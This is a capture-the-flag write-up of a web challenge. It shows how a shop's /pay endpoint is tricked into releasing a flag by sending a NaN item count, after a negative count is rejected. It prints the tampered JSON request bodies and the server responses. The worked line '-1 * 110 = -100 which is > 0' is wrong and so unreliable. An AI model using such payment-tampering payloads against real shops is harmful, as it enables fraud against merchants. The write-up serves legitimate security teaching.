Rating: 4.7
First we try to buy the real flag and take a look at the request. We see that it just makes a POST request to the /pay endpoint with the following data
```
{"card":[{"name":"asis","count":1}],"coupon":""}
```
We get an error:
```
your credit not enough
```
So copy the request as cURL command and try it again with a negative count. The hope is that this will multiply with the price of the flag and then compare against our balance. -1 * 110 = -100 which is > 0
```
{"card":[{"name":"asis","count":-1}],"coupon":""}
```
Unfortunately we get another error:
```
{"result": "item count must be greater than zero"}
```
After trying some more input we find that we can pass a list or object as the count, and it will fail to convert it to a string.
Finally we try giving NaN for the count:
```
{"card":[{"name":"asis","count":NaN}],"coupon":""}
```
And we get the flag:
```
{"data": [{"data": "ASIS{th1@n_3xpens1ve_Fl@G}\n", "flag": "asis"}], "result": "pay success"}
```
This works because any comparisons with NaN will return false. So if the code checks for our input < 0, it will return false for NaN input and pass the negative input check.